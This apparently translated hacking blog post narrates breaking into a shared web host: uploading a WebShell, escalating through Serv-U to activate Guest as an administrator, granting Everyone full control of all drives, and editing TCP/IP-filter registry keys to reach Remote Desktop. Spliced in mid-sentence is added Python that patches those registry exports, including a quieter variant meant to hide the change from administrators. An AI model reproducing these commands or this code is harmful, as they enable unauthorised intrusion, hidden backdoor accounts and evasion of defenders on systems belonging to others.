From a WebShell, around the firewall, to 3389


From uploading a WebShell, through the TCP/IP filter, to a 3389 Terminal Services logon

Author: LvHuaNa

One: getting a WebShell

A little test tonight. I am still a novice, so there is nothing very technical here; it all went smoothly, and I hope this small post is easy to follow. It was a boring day. At night I went to a video chat site and noticed one chat room that was extremely popular, 500 people inside (full), and after N refreshes I still could not get in .......... Depressing! :( With nothing better to do, I decided to test how well the host was secured, heh (I am a novice, so "testing their security" is really just practising myself). Pinged the site from CMD and got its IP, then looked the IP up at http://whois.Webhosting.info/ to see which other sites live on it. Ha, dozens of sites on the same host, so I figured I could find one or two vulnerable ones. Searched, and finally found a page with an upload vulnerability, http://www.xxx.net/upfile_soft.asp, and uploaded a WebShell (Haoyang 2005 official version) through it (I will not go on about how to upload; upload tools are everywhere now).

Two: escalating privileges and creating a user

Got the WebShell, got excited, and then found it had almost no permissions: I could only move around inside the directory holding my own WebShell (the C, D, E and F drives could not be browsed), and I could not even delete files. ^ Scanned his IP with SuperScan and saw from the banner that he was running Serv-U version 5.0. Went to the webshell's 〖wscript.shell〗 function to try running CMD commands: that did not work, and entering net user gave nothing; but running the CMD command through wscript.shell and then entering NET USER returned his user list. Haha, good, this one is doable!! Uploaded the Serv-U privilege-escalation tool (it runs commands through the Serv-U service, which has far more rights than the web user) into the D:\A004\TGGTWE\****.com\uploadsoft directory, renamed it test.exe, then went back to 〖wscript.shell〗 to run commands. Hehe, the fat chicken is about to be in hand, can't wait ~ Without further ado, run through WScript.Shell:

D:\A004\TGGTWE\****.com\uploadsoft\test.exe "net user guest /active:yes"    # activate the Guest account; I like using this one
D:\A004\TGGTWE\****.com\uploadsoft\test.exe "net user guest lvhuana"    # set the Guest password to lvhuana
D:\A004\TGGTWE\****.com\uploadsoft\test.exe "net localgroup administrators guest /add"    # raise Guest to Administrator rights

With the account set up, run net localgroup administrators to check; the echo shows the addition succeeded.

Then netstat -an showed his Terminal Services port open on the default 3389. OK, let's try connecting ~

Three: getting past the TCP/IP filter

Connect!? Dizzy ........... I pulled out SuperScan to scan his 3389 and could not reach it at all ...... (a firewall is on!? Damn, what a bummer ...). Nothing for it; back to WScript.Shell to run CMD commands:

D:\A004\TGGTWE\****.com\uploadsoft\test.exe "cacls.exe C: /E /T /G everyone:F"    # grant Everyone full control of C: (recursively) so the drive can be browsed
D:\A004\TGGTWE\****.com\uploadsoft\test.exe "cacls.exe D: /E /T /G everyone:F"    # same for D:
D:\A004\TGGTWE\****.com\uploadsoft\test.exe "cacls.exe E: /E /T /G everyone:F"    # same for E:
D:\A004\TGGTWE\****.com\uploadsoft\test.exe "cacls.exe F: /E /T /G everyone:F"    # same for F:

At the very least the whole hard disk can now be traversed. I walked through the disks and found no firewall program, so I had a fair idea: it must be TCP/IP filtering! (Of course, the server might also sit on an internal network; ipconfig /all will tell you.) TCP/IP filtering can be defeated through his registry: export the three registry locations that control it, change them, and import them back. Back to 〖wscript.shell〗 to run the CMD commands:

D:\A004\TGGTWE\****.com\uploadsoft\test.exe "regedit -e D:\A004\TGGTWE\****.com\uploadsoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"    # export the first registry location for TCP/IP filtering
D:\A004\TGGTWE\****.com\uploadsoft\test.exe "regedit -e D:\A004\TGGTWE\****.com\uploadsoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip"    # export the second registry location for TCP/IP filtering
D:\A004\TGGTWE\****.com\uploadsoft\test.exe "regedit -e D:\A004\TGGTWE\****.com\uploadsoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip"    # export the third registry location for TCP/IP filtering

Then back in 〖stream〗 or 〖FSO〗, 1.reg, 2.reg and 3.reg are sitting there quietly, hehe ~ Download 1.reg, 2.reg and 3.reg to your own hard disk and change the TCP/IP filtering: first open 1.reg, find "EnableSecurityFilters"=dword:00000001 and change the trailing 1 to 0; then change 2.reg and 3.reg the same way,
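The registry step above is where the whole thing turns, so here is an added example (my own code, not the author's) that reads a regedit export of the Tcpip service key, reports whether filtering is on and which TCP ports an interface permits, and writes a patched export either by flipping EnableSecurityFilters to 0 as the article does, or by appending 3389 to each interface's TCPAllowedPorts list, which keeps the filter on and is far less conspicuous. The sample export, its hostname and its interface GUID are constructed for the example; a real export carries many more values. Two caveats from the Windows side: CurrentControlSet is an alias for whichever ControlSetNNN the value HKLM\SYSTEM\Select\Current names, which is why the article exports all three; and the filter settings are read when the TCP/IP stack starts, so the change does not take effect until the box reboots.

```python
"""Inspect and patch regedit exports of HKLM\\SYSTEM\\...\\Services\\Tcpip for the
TCP/IP filtering settings (EnableSecurityFilters, per-interface TCPAllowedPorts)."""
import re

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
PARAMS_SUFFIX = "\\SERVICES\\TCPIP\\PARAMETERS"

# Constructed sample export: hostname and interface GUID are made up.
# Filtering is on; only TCP 80 and 21 are permitted, UDP "0" means permit all.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"Hostname"="web01"
"EnableSecurityFilters"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6F2A3B1C-0000-4000-8000-000000000001}]
"TCPAllowedPorts"=hex(7):38,00,30,00,00,00,32,00,\
  31,00,00,00,00,00
"UDPAllowedPorts"=hex(7):30,00,00,00,00,00
"""


def _join_continuations(text):
    """regedit wraps long hex values with a trailing backslash; re-join them."""
    lines, pending = [], ""
    for raw in text.splitlines():
        line = pending + raw.rstrip().lstrip() if pending else raw.rstrip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        lines.append(line)
    if pending:
        lines.append(pending)
    return lines


def decode_multi_sz(raw):
    """REG_MULTI_SZ: UTF-16LE strings, each NUL-terminated, plus a final NUL."""
    return [s for s in raw.decode("utf-16-le").split("\x00") if s]


def encode_multi_sz(strings):
    data = ("\x00".join(strings) + "\x00\x00").encode("utf-16-le")
    return "hex(7):" + ",".join(f"{b:02x}" for b in data)


def _hex_bytes(data):
    return bytes(int(b, 16) for b in data.split(":", 1)[1].split(",") if b)


def parse_reg(text):
    """Return {key_path: {value_name: (type, value)}} for dword/sz/multi_sz."""
    reg, key = {}, None
    for line in _join_continuations(text):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            reg[key] = {}
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        name, data = m.group("name"), m.group("data")
        if data.startswith("dword:"):
            reg[key][name] = ("dword", int(data[6:], 16))
        elif data.startswith("hex(7):"):
            reg[key][name] = ("multi_sz", decode_multi_sz(_hex_bytes(data)))
        elif data.startswith('"') and data.endswith('"'):
            reg[key][name] = ("sz", data[1:-1])
        else:
            reg[key][name] = ("raw", data)
    return reg


def filtering_enabled(reg):
    for key, values in reg.items():
        if key.upper().endswith(PARAMS_SUFFIX) and "EnableSecurityFilters" in values:
            return values["EnableSecurityFilters"][1] == 1
    return False


def allowed_tcp_ports(reg):
    """Map interface key -> permitted TCP ports; a list containing "0" permits all."""
    return {k: v["TCPAllowedPorts"][1] for k, v in reg.items()
            if "\\Interfaces\\" in k and "TCPAllowedPorts" in v}


def port_reachable(reg, port):
    """Would inbound TCP `port` pass the filter on every interface that carries a
    list? Assumption: with filtering on and no lists at all, report blocked."""
    if not filtering_enabled(reg):
        return True
    lists = allowed_tcp_ports(reg).values()
    return bool(lists) and all("0" in p or str(port) in p for p in lists)


def patch_reg(text, port, disable_filtering=False):
    """Return a modified export: flip EnableSecurityFilters to 0 (the article's
    way) or, quieter, add `port` to every interface's TCPAllowedPorts."""
    out, key = [], None
    for line in _join_continuations(text):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        m = VALUE_RE.match(line)
        if m and disable_filtering and m.group("name") == "EnableSecurityFilters":
            line = '"EnableSecurityFilters"=dword:00000000'
        elif (m and not disable_filtering and m.group("name") == "TCPAllowedPorts"
              and key and "\\Interfaces\\" in key):
            ports = decode_multi_sz(_hex_bytes(m.group("data")))
            if "0" not in ports and str(port) not in ports:
                ports.append(str(port))
            line = '"TCPAllowedPorts"=' + encode_multi_sz(ports)
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    print("filtering on:", filtering_enabled(reg), "| 3389 reachable:", port_reachable(reg, 3389))
    print(patch_reg(SAMPLE_REG, 3389))
```

Feed the files produced by the article's `regedit -e` exports through `patch_reg`, import the result with `regedit /s file.reg` (or through the same wscript.shell route), and verify from outside with a port scan after the reboot, as the article did with SuperScan. The `port` route leaves EnableSecurityFilters at 1, so an admin glancing at the TCP/IP filtering dialog still sees filtering "on" and has to read the port list to notice the change.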

Please credit the original address when reposting: https://www.9cbs.com/read-60249.html
